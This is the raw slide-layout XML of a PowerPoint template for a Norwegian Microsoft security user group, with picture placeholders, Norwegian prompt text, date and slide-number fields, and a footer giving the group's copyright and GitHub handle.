          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252000" y="-384054"/>
            <a:ext cx="4080298" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" noProof="0"/>
              <a:t>Farge på tekst</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7B50B3-78D9-4804-90E1-0DBFB1B0DE5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-374907"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="494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97" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39E44C25-DC6F-4E76-BA3E-745C0EEA4539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1937469" y="2180422"/>
            <a:ext cx="1513338" cy="1513338"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Sett inn ikon eller bilde her</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D28B304-042B-4EC3-B8BD-9A9684FC2691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5348414" y="2180422"/>
            <a:ext cx="1513338" cy="1513338"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Sett inn ikon eller bilde her</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7458896F-4266-4991-A883-A25E4AE97C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8759358" y="2180422"/>
            <a:ext cx="1513338" cy="1513338"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Sett inn ikon eller bilde her</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1862608118"/>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BAA29E41-810D-40C7-B445-C9A3A42F92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68574" y="485301"/>
            <a:ext cx="6454852" cy="6464977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42639297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71CE9-E242-4896-9FEB-BE7F847FE2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D97DEA-7AF4-4B70-A5E5-8FA3A61652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C03F5E-B020-452C-BB56-81BD6005560A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156981" y="6492875"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D0E4BA55-9EBB-4D8A-927E-06E14CE18DE1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E225D6AB-CAE0-43DF-8ED1-6A4A49229D8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60AABEA-5F26-4EF4-96EF-4BC547429FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27966014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80558-174B-41AF-B1EA-2441DFBA27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52C7D1-935B-4E37-B381-2E871729F3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0F1B83-C232-4006-A99E-3968AF259C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ADDC5271-D635-40A1-89AA-F1F2949253CF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB6E048-3007-4BD7-B5E8-BC7183634B9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4E85060-5BEA-49EF-8292-6F986C9913A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BBFBB0B3-EBEB-4B48-A07D-AE47399A9A28}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4176606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8543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="22860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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="529646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8543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244637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8543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2092501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28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="22860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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="610603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28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Footer Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206328315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543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="22860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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2164470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github.com/msugn"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2.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hyperlink" Target="https://github.com/msugn" TargetMode="Externa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hyperlink" Target="https://github.com/msugn" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/><Relationship Id="rId16"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19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.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74420" y="6571338"/>
            <a:ext cx="3733800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/19/2022</a:t>
            </a:fld>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B228708A-075D-4980-A833-237E2466F084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="73950" y="5962808"/>
            <a:ext cx="893790" cy="895192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4C11AE-FC43-4D28-9F7C-CAE1A33E7371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4359566" y="6574931"/>
            <a:ext cx="3284874"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noProof="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>©2022 Microsoft Security User Group Norway All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8281ED09-5C7E-4425-A394-9BA447C8A189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11077338" y="6586591"/>
            <a:ext cx="612668" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#MSUGN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D78E4FD-96FB-45DC-B234-DA96293CAC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593231" y="6455922"/>
            <a:ext cx="1096775" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>@MsSecUGNorway</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F566C4-94A0-44DB-88B6-51620ABCF960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10593230" y="6306486"/>
            <a:ext cx="1063112" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>msugn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D934E5A-E5A7-4526-A806-D553111F1ACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15" cstate="print">
            <a:alphaModFix amt="69000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10516712" y="6523366"/>
            <a:ext cx="124142" cy="124142"/>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E9C0D8A6-34C2-488E-95FB-8CD7908FC050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print">
            <a:alphaModFix amt="58000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10508139" y="6360073"/>
            <a:ext cx="141339" cy="141339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23076414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74420" y="6571338"/>
            <a:ext cx="3733800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/20/2022</a:t>
            </a:fld>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B228708A-075D-4980-A833-237E2466F084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
